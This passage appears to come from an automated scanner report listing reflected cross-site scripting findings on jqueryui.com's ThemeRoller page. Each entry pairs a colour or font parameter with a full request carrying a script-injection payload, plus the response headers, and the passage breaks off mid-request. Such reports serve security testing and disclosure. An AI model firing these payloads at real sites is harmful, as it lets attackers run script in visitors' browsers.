GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ad65d0"><script>alert(1)</script>042902ea54a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7f9"><script>alert(1)</script>680216dd329 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222fb7f9"><script>alert(1)</script>680216dd329&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac58"><script>alert(1)</script>288ea6641f4 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=3636364ac58"><script>alert(1)</script>288ea6641f4&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1729"><script>alert(1)</script>d30e2b92665 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121e1729"><script>alert(1)</script>d30e2b92665&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3133c"><script>alert(1)</script>1841d7744ed was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif3133c"><script>alert(1)</script>1841d7744ed&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 988bb"><script>alert(1)</script>8a2c7460782 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em988bb"><script>alert(1)</script>8a2c7460782&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9db"><script>alert(1)</script>ef4213fbf23 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normaleb9db"><script>alert(1)</script>ef4213fbf23&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120002
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c10"><script>alert(1)</script>093068ed04f was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545a7c10"><script>alert(1)</script>093068ed04f&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2f4"><script>alert(1)</script>a6a969de1a8 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222224b2f4"><script>alert(1)</script>a6a969de1a8&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30360"><script>alert(1)</script>3dda5c6d39d was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888830360"><script>alert(1)</script>3dda5c6d39d&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9152e"><script>alert(1)</script>516645a1257 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9152e"><script>alert(1)</script>516645a1257&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31e6"><script>alert(1)</script>bee3a69fc06 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222c31e6"><script>alert(1)</script>bee3a69fc06&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fca1"><script>alert(1)</script>544cc932a96 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7fca1"><script>alert(1)</script>544cc932a96&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f31c"><script>alert(1)</script>a87b30d1a5d was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545451f31c"><script>alert(1)</script>a87b30d1a5d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight